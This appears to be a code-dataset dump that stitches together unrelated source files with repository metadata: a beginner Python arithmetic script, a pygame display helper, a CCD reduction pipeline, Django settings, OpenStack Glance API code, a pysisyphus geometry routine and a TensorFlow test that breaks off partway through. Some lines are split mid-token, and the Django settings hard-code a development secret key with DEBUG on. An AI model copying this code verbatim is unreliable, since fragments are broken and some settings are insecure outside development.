2,216
0.009928
#import factorial #import square x = int(raw_input("What is 'x'?\n")) y = int(raw_input("What is y?\n")) # question0 = str(raw_input("Define a y value? (y/n)\n")) # if (question0 == "y","Y","yes","Yes"): # y = int(raw_input("What will 'y' be?\n")) # elif (y == "n","N","no","No"): # question2 = str(raw_input("Is y = 10 ok?\n")) # if (question2 == "y","Y","yes","Yes"): # y = 10 # elif (question2 == "n","N","no","No"): # y = int(raw_input("What will 'y' be?\n")) # else: # print "Please insert an integer" # else: # print "Please insert an integer." print "Using that information, we can do some mathematical equations." if x > y: #is not None: print "x, %d, is greater than y, %d." % (x, y) elif x == y: #is not None: print "x, %d, is equal to y, %d." % (x, y) elif x < y: #is not None: print "x, %d, is less than y, %d." % (x, y) elif x is not int: print "x should be an integer, you put it as %d" % (x) elif x is None: print "Please rerun the code." else: print "Something went wrong!" add = (x + y) sub = (x - y) mult = (x * y) div = (x / y) rem = (x % y) xeven = (x % 2 == 0) xodd = (x % 2 != 0) yeven = (y % 2 ==
0) yodd = (y % 2 != 0) # xfact = (factorial(x)) # yfact = (factorial(y)) print "If you add x and y, you'll get %s." % add print "If you subtract x and y, you'll get %s." % sub print "If you multiply x and y, you'll get %s." % mult print "If you divide x
and y, you'll get %s, with a remainder of %s." % (div, rem) if (x % 2 == 0): print "x is even." if (x % 2 != 0): print "x is odd." if (y % 2 == 0): print "y is even." if (y % 2 != 0): print "y is odd." print "If you square x, you get %s, and y squared is %s." % ((x**2),(y**2)) print "If you cube x, you get %s, and y cubed is %s." % ((x**3), (y**3)) #print "If you take x factorial, you get %s, and y factorial is %s." % ((xfact), (yfact)) #print "The square root of x is %s, and the square root of y is %s." % (square(x), square(y)) print "" # from sys import argv # import random # value = (1,2,3,4,5,6) # roll, string = argv # def choice(roll): # random.choice(dice) # return choice # choice(roll) # dice = choice(value)
alex-dow/psistatsrd
psistatsrd/utils/drawable.py
Python
mit
2,757
0.009068
import pygame import sys from psistatsrd.app import App def create_queue_row(data, config): mem_graph = create_mem_graph(config) cpu_graph = create_cpu_graph(config) scroll_text = [] title = [] if type(data['ipaddr']).__name__ == "list": scroll_text = scroll_text + data['ipaddr'] else: scroll_text = [data['ipaddr']] scroller = create_scroller(scroll_text, config) row = create_row(config) row.host = data['hostname'] row.add_drawable('scroller', scroller, App.DRAW_EVENT) row.add_drawable('cpu', cpu_graph, App.POLL_EVENT) row.add_drawable('mem', mem_graph, App.POLL_EVENT) return row def create_row(config): row = StatRow( border_width=int(config['statrow.border_width']), border_color=config['statrow.border_color'], height=int(config['statrow.height']), width=int(config['statrow.width']), bgcolor=config['statrow.bgcolor'], title_font_size=int(config['statrow.title_font_size']), title_font_aa=config['statrow.title_font_aa'], title_font=config['statrow.title_font'], title_color=config['statrow.title_color'], ) return row def create_scroller(scroll_text, config): s =
Scroller( scroll_speed = float(config['scroller.scroll_speed']), scroll_delay = int(config['scroller.scroll_delay']), scroll_pause = int(config['scroller.scroll_pause']), text_font = config['scroller.font.name'], text_aa = config['scroller.font.aa'], text_size = int(config['scroller.font.size']), width = int(config['scroller.width']), height = int(config['scroller.height']), color=config['scr
oller.color'], bgcolor=config['scroller.bgcolor'], text_lines=scroll_text ) return s def create_resource_graph(key, config): g = Graph2( height=int(config['graph.%s.height' % key]), width=int(config['graph.%s.width' % key]), line_width=int(config['graph.%s.line_width' % key]), color=config['graph.%s.color' % key], bgcolor=config['graph.%s.bgcolor' % key], line_aa=config['graph.%s.line_aa' % key] ) max_color = 'graph.%s.max_color' % key min_color = 'graph.%s.min_color' % key if max_color in config: g.max_color = config[max_color] if min_color in config: g.min_color = config[min_color] return g def create_cpu_graph(config): return create_resource_graph('cpu', config) def create_mem_graph(config): return create_resource_graph('mem', config) from psistatsrd.app import App from psistatsrd.graph2 import Graph2 from psistatsrd.scroller import Scroller from psistatsrd.statrow import StatRow
alexrudy/AstroObject
Examples/pipeline.py
Python
gpl-3.0
7,924
0.016406
#!/usr/bin/env python # -*- coding: utf-8 -*- # # pipeline.py # AstroObject # # Created by Alexander Rudy on 2012-04-25. # Copyright 2012 Alexander Rudy. All rights reserved. # u""" Basic CCD Reduction Pipeline written with AstroObject """ # Python Imports import shutil import os import collections # Numpy Imports import numpy as np # Package Resources Imports from pkg_resources import resource_filename # PyRAF Imports from pyraf import iraf from iraf import imred, ccdred from AstroObject.simulator import Simulator from AstroObject.simulator import ( optional, description, include, replaces, depends, excepts, collect, ignore, help ) from AstroObject.image import ImageStack from AstroObject.iraftools import UseIRAFTools from AstroObject.loggers import logging ImageStack = UseIRAFTools(ImageStack) class Pipeline(Simulator): """A task manager for the RC Pipeline""" def __init__(self): super(Pipeline, self).__init__(commandLine=True,name="Example Pipeline",version="1.0") self.config.load(resource_filename(__name__,"Defaults.yaml")) self.config.setFile("Main") self.config.load() self.collect() @ignore #Don't load this method as a stage... it is a helper method used to implement other stages. def load_type(self,key,stack): """Load a specific type of files using a generalized loading procedure""" if isinstance(self.config[key]["Files"],collections.Sequence): ReadStates = [] for filename in self.config[key]["Files"]: ReadStates += stack.read(filename) self.log.debug("Loaded %s: %s" % (key,filename)) return ReadStates else: self.log.error("No %s files are given." % key) raise IOError("No %s files are given." % key) def load_bias(self): """Loading Raw Bias Frames""" # Load individual bias frames. self.bias = ImageStack()
self.load_type("Bias",self.bias)
# Set Header Values for each image. for frame in self.bias.values(): frame.header.update('IMAGETYP','zero') self.log.debug("Set IMAGETYP=zero for frame %s" % frame) self.log.debug("Set Header IMAGETYP=zero for frames %r" % self.bias.list()) def load_dark(self): """Loading Dark Frames""" # Load individual dark frames. self.dark = ImageStack() self.load_type("Dark",self.dark) # Set Header Values for each image. for frame in self.dark.values(): frame.header.update('IMAGETYP','dark') self.log.debug("Set IMAGETYP=dark for frame %s" % frame) self.log.debug("Set Header IMAGETYP=dark for frames %r" % self.dark.list()) def load_flat(self): """Loading Flat Frames""" # Load individual flat frames. self.flat = ImageStack() self.load_type("Flat",self.flat) # Set Header Values for each image. for frame in self.flat.values(): frame.header.update('IMAGETYP','flat') self.log.debug("Set IMAGETYP=flat for frame %s" % frame) self.log.debug("Set Header IMAGETYP=flat for frames %r" % self.flat.list()) @help("Create bias frames from the configured bias list.") @depends("load-bias") # Declare a dependency on another stage: Method ``load_bias()``. def create_bias(self): """Creating Combined Bias Frame""" self.log.debug("Running iraf.zerocombine on image list...") iraf.unlearn(iraf.zerocombine) iraf.zerocombine(self.bias.iinat(), output=self.bias.iout("Bias"), combine=self.config["Bias.Combine"], ccdtype="zero", reject=self.config["Bias.Reject"], scale="none", nlow=0, nhigh=1, nkeep=1, mclip="yes", lsigma=3.0, hsigma=3.0, rdnoise="0.", gain ="1." ) self.bias.idone() @help("Create Dark Frames") @depends("load-dark") def create_dark(self): """Creating Combined Dark Frame""" self.log.debug("Running iraf.darkcombine on image list...") iraf.unlearn(iraf.darkcombine) iraf.darkcombine(self.dark.iraf.inatfile(), output=self.dark.iraf.outfile("Dark"), combine=self.config["Dark.Combine"], ccdtype="dark", reject=self.config["Dark.Reject"], process="no", scale="exposure", nlow=0, nhigh=1, nkeep=1, mclip="yes", lsigma=3.0, hsigma=3.0, rdnoise="0.", gain ="1." ) self.dark.iraf.done() @help("Create Flat Frames") @depends("load-flat") def create_flat(self): """Creating Combined Flat Frame""" self.log.debug("Running iraf.flatcombine on image list...") iraf.unlearn(iraf.flatcombine) iraf.flatcombine(self.flat.iraf.inatfile(), output=self.flat.iraf.outfile("Flat"), combine=self.config["Flat.Combine"], ccdtype="flat", reject=self.config["Flat.Reject"], scale=self.config["Flat.Scale"], process="no", subsets="no", nlow=0, nhigh=1, nkeep=1, mclip="yes", lsigma=3.0, hsigma=3.0, rdnoise="0.", gain ="1.") self.flat.iraf.done() def load_data(self): """Loading Raw Data into the system.""" self.data = ImageStack() self.load_type("Data",self.data) @include # Set this stage as something to be run with the *all macro. @depends("create-bias","load-data") @help("Subtract Bias Frame") def subtract_bias(self): """Subtracting Bias Frame""" iraf.unlearn(iraf.ccdproc) iraf.ccdproc(self.data.iraf.modatfile(), ccdtype="", fixpix="no", overscan="no", trim ="no", zerocor="yes", darkcor="no", flatcor ="no", zero=self.bias.iin("Bias")) self.data.idone() @include # Set this stage as something to be run with the *all macro.
@depends("create-dark","load-data") @help("Subtract Dark Frame") def subtract_dark(self): """Subtracting Dark Frame""" iraf.unlearn(iraf.ccdproc) iraf.ccdproc(self.data.iraf.modatfile(), ccdtype="", fixpix="no", overscan="no", trim ="no", zerocor="no", darkcor="yes", flatcor ="no", dark=self.dark.iin("Dark")) self.data.idone() @include # Set this stage as something to be run with the *all macro. @depends("create-flat","load-data") @help("Divide out flat frame") def divide_flat(self): """Dividing by Flat Frame""" iraf.unlearn(iraf.ccdproc) iraf.ccdproc(self.data.iraf.inatfile(), output=self.data.iraf.outatfile(append="-Flat"), flat=self.flat.iin("Flat"), ccdtype="", fixpix="no", overscan="no", trim ="no", zerocor="no", flatcor="yes", darkcor ="no") self.data.iraf.done() # Since the simulator loads and runs stages in order, this stage will always # be run last. @include # Set this stage as something to be run with the *all macro. @depends("load-data") def save_file(self): """Save the new fits file""" self.data.write("DataFile.fits",frames=[self.data.framename],clobber=True) @help("Save Partial Images") @depends("create-flat","create-dark","create-bias") def save_partials(self): """Saving partial images""" self.bias.write(frames=["Bias"],filename=self.config["Bias.Master"],clobber=True) self.dark.write(frames=["Dark"],filename=self.config["Dark.Master"],clobber=True) self.flat.write(frames=["Flat"],filename=self.config["Flat.Master"],clobber=True) def main(): pipeline = Pipeline() pipeline.run() if __name__ == '__main__': main()
jacoboamn87/todolist
todo/settings.py
Python
gpl-3.0
3,308
0.001209
""" Django settings for todo project. Generated by 'django-admin startproject' using Django 1.9.2. For more information on this file, see https://docs.djangoproject.com/en/1.9/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.9/ref/settings/ """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '-b9xx8+eul3#8q&c@tv^5e!u66j=a6@377$y^b2q!0a%vj+!ny' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition DJANGO_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', ] THIRD_PARTY_APPS = [] CUSTOM_APPS = [ 'tasks.apps.TasksConfig', ] INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + CUSTOM_APPS MIDDLEWARE_CLASSES = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.auth.middleware.SessionAuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'todo.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': ['todo/templates'], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'todo.wsgi.application' # Database # https://docs.djangoproject.com/en/1.9/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Password validation # https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation
.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/1.9/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18
N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.9/howto/static-files/ STATIC_URL = '/static/'
openstack/glance
glance/api/v2/metadef_namespaces.py
Python
apache-2.0
38,490
0
# Copyright (c) 2014 Hewlett-Packard Development Company, L.P. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. import http.client as http import urllib.parse as urlparse from oslo_config import cfg from oslo_log import log as logging from oslo_serialization import jsonutils from oslo_utils import encodeutils import webob.exc from wsme.rest import json from glance.api import policy from glance.api.v2.model.metadef_namespace import Namespace from glance.api.v2.model.metadef_namespace import Namespaces from glance.api.v2.model.metadef_object import MetadefObject from glance.api.v2.model.metadef_property_type import PropertyType from glance.api.v2.model.metadef_resource_type import ResourceTypeAssociation from glance.api.v2.model.metadef_tag import MetadefTag from glance.api.v2 import policy as api_policy from glance.common import exception from glance.common import utils from glance.common import wsgi from glance.common import wsme_utils import glance.db import glance.gateway from glance.i18n import _, _LE import glance.notifier import glance.schema LOG = logging.getLogger(__name__) CONF = cfg.CONF class NamespaceController(object): def __init__(self, db_api=None, policy_enforcer=None, notifier=None): self.db_api = db_api or glance.db.get_api() self.policy = policy_enforcer or policy.Enforcer() self.notifier = notifier or glance.notifier.Notifier() self.gateway = glance.gateway.Gateway(db_api=self.db_api, notifier=self.notifier, policy_enforcer=self.policy) self.n
s_schema_lin
k = '/v2/schemas/metadefs/namespace' self.obj_schema_link = '/v2/schemas/metadefs/object' self.tag_schema_link = '/v2/schemas/metadefs/tag' def index(self, req, marker=None, limit=None, sort_key='created_at', sort_dir='desc', filters=None): try: ns_repo = self.gateway.get_metadef_namespace_repo( req.context, authorization_layer=False) policy_check = api_policy.MetadefAPIPolicy( req.context, enforcer=self.policy) # NOTE(abhishekk): This is just a "do you have permission to # list namespace" check. Each namespace is checked against # get_metadef_namespace below. policy_check.get_metadef_namespaces() # NOTE(abhishekk): We also need to fetch resource_types associated # with namespaces, so better to check we have permission for the # same in advance. policy_check.list_metadef_resource_types() # Get namespace id if marker: namespace_obj = ns_repo.get(marker) marker = namespace_obj.namespace_id database_ns_list = ns_repo.list( marker=marker, limit=limit, sort_key=sort_key, sort_dir=sort_dir, filters=filters) ns_list = [ ns for ns in database_ns_list if api_policy.MetadefAPIPolicy( req.context, md_resource=ns, enforcer=self.policy).check( 'get_metadef_namespace')] rs_repo = ( self.gateway.get_metadef_resource_type_repo( req.context, authorization_layer=False)) for db_namespace in ns_list: # Get resource type associations filters = dict() filters['namespace'] = db_namespace.namespace repo_rs_type_list = rs_repo.list(filters=filters) resource_type_list = [ ResourceTypeAssociation.to_wsme_model( resource_type ) for resource_type in repo_rs_type_list] if resource_type_list: db_namespace.resource_type_associations = ( resource_type_list) namespace_list = [Namespace.to_wsme_model( db_namespace, get_namespace_href(db_namespace), self.ns_schema_link) for db_namespace in ns_list] namespaces = Namespaces() namespaces.namespaces = namespace_list if len(namespace_list) != 0 and len(namespace_list) == limit: namespaces.next = ns_list[-1].namespace except exception.Forbidden as e: LOG.debug("User not permitted to retrieve metadata namespaces " "index") raise webob.exc.HTTPForbidden(explanation=e.msg) except exception.NotFound as e: raise webob.exc.HTTPNotFound(explanation=e.msg) return namespaces @utils.mutating def create(self, req, namespace): try: namespace_created = False # Create Namespace ns_factory = self.gateway.get_metadef_namespace_factory( req.context, authorization_layer=False) ns_repo = self.gateway.get_metadef_namespace_repo( req.context, authorization_layer=False) # NOTE(abhishekk): Here we are going to check if user is authorized # to create namespace, resource_types, objects, properties etc. policy_check = api_policy.MetadefAPIPolicy( req.context, enforcer=self.policy) policy_check.add_metadef_namespace() if namespace.resource_type_associations: policy_check.add_metadef_resource_type_association() if namespace.objects: policy_check.add_metadef_object() if namespace.properties: policy_check.add_metadef_property() if namespace.tags: policy_check.add_metadef_tag() # NOTE(abhishekk): As we are getting rid of auth layer, this # is the place where we should add owner if it is not specified # in request. 
kwargs = namespace.to_dict() if 'owner' not in kwargs: kwargs.update({'owner': req.context.owner}) new_namespace = ns_factory.new_namespace(**kwargs) ns_repo.add(new_namespace) namespace_created = True # Create Resource Types if namespace.resource_type_associations: rs_factory = (self.gateway.get_metadef_resource_type_factory( req.context, authorization_layer=False)) rs_repo = self.gateway.get_metadef_resource_type_repo( req.context, authorization_layer=False) for resource_type in namespace.resource_type_associations: new_resource = rs_factory.new_resource_type( namespace=namespace.namespace, **resource_type.to_dict()) rs_repo.add(new_resource) # Create Objects if namespace.objects: object_factory = self.gateway.get_metadef_object_factory( req.context, authorization_layer=False) object_repo = self.gateway.get_metadef_object_repo( req.context, authorization_layer=False) for metadata_object in namespace.objects: new_meta_object = object_factory.new_object( namespace=namespace.namespace, **metadata_object.to_dict()) object_repo.add(new_meta_object) # Create Tags if namespace.tags: tag_factory = self.gateway.get_metadef_tag_factory( req.context, authorization_layer=False)
eljost/pysisyphus
pysisyphus/drivers/precon_pos_rot.py
Python
gpl-3.0
19,597
0.000714
# [1] https://doi.org/10.1002/jcc.26495 # Habershon, 2021 """ prp a901cdfacc579eb63b193cbc9043212e8b57746f pysis 340ab6105ac4156f0613b4d0e8f080d9f195530c do_trans accidentally disabled in transtorque """ from functools import reduce import itertools as it import numpy as np from pysisyphus.calculators import ( HardSphere, TransTorque, AtomAtomTransTorque, Composite, ) from pysisyphus.constants import BOHR2ANG from pysisyphus.Geometry import Geometry from pysisyphus.helpers import align_coords from pysisyphus.helpers_pure import highlight_text from pysisyphus.init_logging import init_logging from pysisyphus.intcoords.setup import get_fragments, get_bond_sets from pysisyphus.xyzloader import coords_to_trj, make_xyz_str init_logging() class SteepestDescent: def __init__( self, geom, max_cycles=1000, max_step=0.05, rms_force=0.05, rms_force_only=True, prefix=None, dump=False, print_mod=25, ): self.geom = geom self.max_cycles = max_cycles self.max_step = max_step self.rms_force = rms_force self.rms_force_only = rms_force_only self.prefix = prefix self.dump = dump self.print_mod = print_mod self.all_coords = np.zeros((max_cycles, self.geom.coords.size)) def run(self): coords = self.geom.coords.copy() to_dump = [] for i in range(self.max_cycles): self.all_coords[i] = coords.copy() if self.dump and (i % 100) == 0: to_dump.append(self.geom.as_xyz(cart_coords=coords)) results = self.geom.get_energy_and_forces_at(coords) forces = results["forces"] norm = np.linalg.norm(forces) rms = np.sqrt(np.mean(forces ** 2)) if rms <= self.rms_force: print(f"Converged in cycle {i}. Breaking.") break if i > 0: beta = forces.dot(forces) / self.prev_forces.dot(self.prev_forces) step = forces + beta * self.prev_step else: step = forces.copy() # step = forces.copy() step *= min(self.max_step / np.abs(step).max(), 1) if i % self.print_mod == 0: print( f"{i:03d}: |forces|={norm: >12.6f} " f"rms(forces)={np.sqrt(np.mean(forces**2)): >12.6f} " f"|step|={np.linalg.norm(step): >12.6f}" ) coords += step self.prev_step = step self.prev_forces = forces self.geom.coords = coords self.all_coords = self.all_coords[: i + 1] if to_dump: with open("optimization.trj", "w") as handle: handle.write("\n".join(to_dump)) def get_fragments_and_bonds(geoms): if isinstance(geoms, Geometry) or len(geoms) == 1: geom = geoms atoms = geom.atoms coords3d = geom.coords3d bonds = [frozenset(bond) for bond in get_bond_sets(atoms, coords3d)] fragments = get_fragments(atoms, coords3d.flatten(), bond_inds=bonds) frag_inds = list(it.chain(*fragments)) if len(frag_inds) != len(atoms): all_inds = list(range(len(atoms))) missing_inds = set(all_inds) - set(frag_inds) for mi in missing_inds: fragments.append(frozenset((mi,))) frag_bonds = [ list(filter(lambda bond: bond <= frag, bonds)) for frag in fragments ] # frag_atoms = [[a for i, a in enumerate(atoms) if i in frag] for frag in fragments] # Assert that we do not have any interfragment bonds assert reduce((lambda x, y: x + len(y)), frag_bonds, 0) == len(bonds) union_geom = geom.copy(coord_type="cart") else: # Form union, determine consistent new indices for all atoms and calculate bonds raise Exception() # return fragments, frag_bonds, set(bonds), frag_atoms return fragments, frag_bonds, set(bonds), union_geom def get_rot_mat(coords3d_1, coords3d_2, center=False): coords3d_1 = coords3d_1.copy().reshape(-1, 3) coords3d_2 = coords3d_2.copy().reshape(-1, 3) def _center(coords3d): return coords3d - coords3d.mean(axis=0) if center: coords3d_1 = _center(coords3d_1) coords3d_2 = _center(coords3d_2) tmp_mat = 
coords3d_1.T.dot(coords3d_2) U, W, Vt = np.linalg.svd(tmp_mat) rot_mat = U.dot(Vt) # Avoid reflections if np.linalg.det(rot_mat) < 0: U[:, -1] *= -1 rot_mat = U.dot(Vt) return rot_mat def get_steps_to_active_atom_mean( frag_lists, iter_frag_lists, ind_dict, coords3d, skip=True ): frag_num = len(frag_lists) steps = np.zeros((frag_num, 3)) for m, frag_m in enumerate(frag_lists): step_m = np.zeros(3) for n, _ in enumerate(iter_frag_lists): if skip and m == n: continue active_inds = ind_dict[(n, m)] if len(active_inds) == 0: continue step_m += coords3d[active_inds].mean(axis=0) step_m /= frag_num steps[m] = step_m return steps def report_frags(rgeom, pgeom, rfrags, pfrags, rbond_diff, pbond_diff): for name, geom in (("Reactant(s)", rgeom), ("Product(s)", pgeom)): print(f"{name}: {geom}\n\n{geom.as_xyz()}\n") def get_frag_atoms(geom, frag): atoms = geom.atoms return [atoms[i] for i in frag] for name, geom, frags in (("reactant", rgeom, rfrags), ("product", pgeom, pfrags)): print(f"{len(frags)} Fragment(s) in {name} image:\n") for frag in frags: frag_atoms = get_frag_atoms(geom, frag) frag_coords = geom.coords3d[list(frag)] frag_xyz = make_xyz_str(frag_atoms, frag_coords * BOHR2ANG) print(frag_xyz + "\n") def print_bonds(geom, bonds): for from_, to_ in bonds: from_atom, to_atom = [geom.atoms[i] for i in (from_, to_)] print(f"\t({from_: >3d}{from_atom} - {to_: >3d}{to_atom})") print("Bonds broken in reactant image:") print_bonds(rgeom, rbond_diff) print() print("Bonds formed in product image:") print_bonds(pgeom, pbond_diff) print() def report_mats(name, mats): for (m, n), indices in mats.items(): print(f"{name}({m}, {n}): {indices}") print() def center_fragments(frag_list, geom): c3d = geom.coords3d for frag in frag_list: mean = c3d[frag].mean(axis=0) c3d[frag] -= mean[None, :] def get_which_frag(frags): which_frag = dict() for frag_ind, frag in enumerate(frags): which_frag.update({atom_ind: frag_ind for atom_ind in frag}) return which_frag def form_A(frags, which_frag, formed_bonds): """Construct the A-matrices. AR[(m, n)] (AP[(m, n)]) contains the subset of atoms in Rm (Pm) that forms bonds with Rn (Pn). """ A = dict() for m, n in formed_bonds: key = (which_frag[m], which_frag[n]) A.setdefault(key, list()).append(m) A.setdefault(key[::-1], list()).append(n) return A CONFIG = { "s2_hs_kappa": 1.0, "s4_hs_kappa": 50.0, "s4_v_kappa": 1.0,
"s4_w_kappa": 1.0, "s5_v_kappa": 1.0, "s5_w_kappa": 3.0, "s5_hs_kappa": 10.0, "s5_z_kappa": 2.0, "s5_trans": True, "s5_rms_force": 0.01, } def precon_pos_rot(reactants, products, prefix=None, config=CONFIG): c = config if prefix is None: prefix = "" def make_fn(
fn): return prefix + fn rfrags, rfrag_bonds, rbonds, runion = get_fragments_and_bonds(reactants) pfrags, pfrag_bonds, pbonds, punion = get_fragments_and_bonds(products) pbond_diff = pbonds - rbonds # Present in product(s) rbond_diff = rbonds - pbonds # Present in reactant(s) involved_atoms = set(tuple(it.chain(*pbond_diff))) involved_atoms |= set(tuple(it.chain(*rbond_diff))) which_rfrag = get_which_frag(rfrags) which_pfrag = get_which_frag(pfrags) rfrag_lists = [list(frag) for frag in rfrags] pfrag_lists = [list(frag) f
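The get_rot_mat helper above is the classic Kabsch rotation fit via SVD. Below is a minimal NumPy sketch of the same construction; the random test data, reference rotation, and tolerance are assumptions for illustration, not part of pysisyphus.

import numpy as np

def kabsch_rot_mat(c1, c2):
    # Same steps as get_rot_mat above: covariance matrix, SVD, and a
    # determinant check that turns an improper fit into a proper rotation.
    U, _, Vt = np.linalg.svd(c1.T.dot(c2))
    rot_mat = U.dot(Vt)
    if np.linalg.det(rot_mat) < 0:
        U[:, -1] *= -1
        rot_mat = U.dot(Vt)
    return rot_mat

rng = np.random.default_rng(0)
coords = rng.normal(size=(10, 3))
theta = 0.3
ref_rot = np.array([[np.cos(theta), -np.sin(theta), 0.0],
                    [np.sin(theta),  np.cos(theta), 0.0],
                    [0.0,            0.0,           1.0]])
rotated = coords.dot(ref_rot)
# The recovered rotation maps the rotated coordinates back onto the originals.
assert np.allclose(rotated.dot(kabsch_rot_mat(rotated, coords)), coords)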
bryanveloso/avalonstar-tv
apps/broadcasts/migrations/0002_auto_20140927_0415.py
Python
apache-2.0
627
0.001595
# -
*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ('broadcasts', '0001_initial'), ] operations = [ migrations.AlterField( model_name='broadcast', name='series', field=models.ForeignKey(related_name=b'broadcasts', blank=True, to='broadcasts.Series', null=True), ), migrations.Alter
Field( model_name='broadcast', name='status', field=models.CharField(max_length=200, blank=True), ), ]
secnot/tutorial-tienda-django-paypal-1
tiendalibros/tiendalibros/wsgi.py
Python
gpl-3.0
401
0
""" WSGI config for tiendalibros project. It exposes the WSGI callable as a module-level variable named ``application``. For more information on this file, see https://docs.djangoproject.
com/en/1.8/howto/deployment/wsgi/ """ import os from django.core.wsgi import get_wsgi_application os.environ.setdefault("DJ
ANGO_SETTINGS_MODULE", "tiendalibros.settings") application = get_wsgi_application()
sarbi127/inviwo
data/scripts/camerarotation.py
Python
bsd-2-clause
687
0.040757
# Inviwo Python script
import inviwo
import math
import time

start = time.clock()
scale = 1
d = 15
steps = 120
for i in range(0, steps):
r = (2 * 3.14 * i) / steps x = d*math.sin(r) z = -d*math.cos(r) inviwo.setPropertyValue("EntryExitPoints.camera",((x*scale,3*scale,z*scale),(0,0,0),(0,1,0))) for i in range(0, steps): r = (2 * 3.14 * i) / (steps) x = 1.0*math.sin(r) z = 1.0*math.cos(r) inviwo.setCameraUp("EntryExitPoints.camera",(x*scale,z*scale,0)) end = time.clock() fps = 2*steps / (end - start) fps = round(fps,3) print(
"Frames per second: " + str(fps)) print("Time per frame: " + str(round(1000/fps,1)) + " ms")
google/spectral-density
tf/experiment_utils_test.py
Python
apache-2.0
3,931
0.005342
# Copyright 2019 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for experiment utils.""" import numpy as np import os import tempfile import tensorflow as tf import experiment_utils class AsymmetricSaverTest(tf.test.TestCase): """Tests for asymmetric saver.""" def test_save_restore(self): x = tf.get_variable('x', []) y = tf.get_variable('y', []) x_dir = tempfile.mkdtemp() y_dir = tempfile.mkdtemp() x_checkpoint_base = os.path.join(x_dir, 'model.ckpt') y_checkpoint_base = os.path.join(y_dir, 'model.ckpt') normal_saver = tf.train.Saver([x, y]) # Save a checkpoint into y_dir first. with self.test_session() as sess: sess.run(tf.global_variables_initializer()) normal_saver.save(sess, y_checkpoint_base, global_step=0) saver = experiment_utils.AsymmetricSaver( [x], [experiment_utils.RestoreSpec( [y], os.path.join(y_dir, 'model.ckpt-0'))]) # Write an x checkpoint. with self.test_session() as sess: sess.run(tf.global_variables_initializer()) x_initial, y_initial = sess.run([x, y]) saver.save(sess, x_checkpoint_base) # Load using AsymmetricSaver. with self.test_session() as sess: sess.run(tf.global_variables_initializer()) saver.restore(sess, tf.train.latest_checkpoint(x_dir)) x_final, y_final = sess.run([x, y]) # Make sure that x is loaded correctly from checkpoint, and that y # isn't. self.assertEqual(x_initial, x_final) self.assertNotAllClose(y_initial, y_final) class FilterNormalizationTest(tf.test.TestCase): def test_basic(self): u = tf.get_variable('abcdef/weights', shape=[7, 5, 3, 2]) v = tf.get_variable('abcdef/biases', shape=[2]) w = tf.get_variable('unpaired/weights', shape=[7, 5, 3, 2]) x = tf.get_variable('untouched', shape=[]) normalize_ops = experiment_utils.normalize_all_filters( tf.trainable_variables()) with self.test_session() as sess: sess.run(tf.global_variables_initializer()) u_initial, v_initial, w_initial, x_initial = sess.run([u, v, w, x
]) sess.run(normalize_ops) u_final, v_final, w_final, x_final = sess.run([u, v, w, x]) u_norms = np.sq
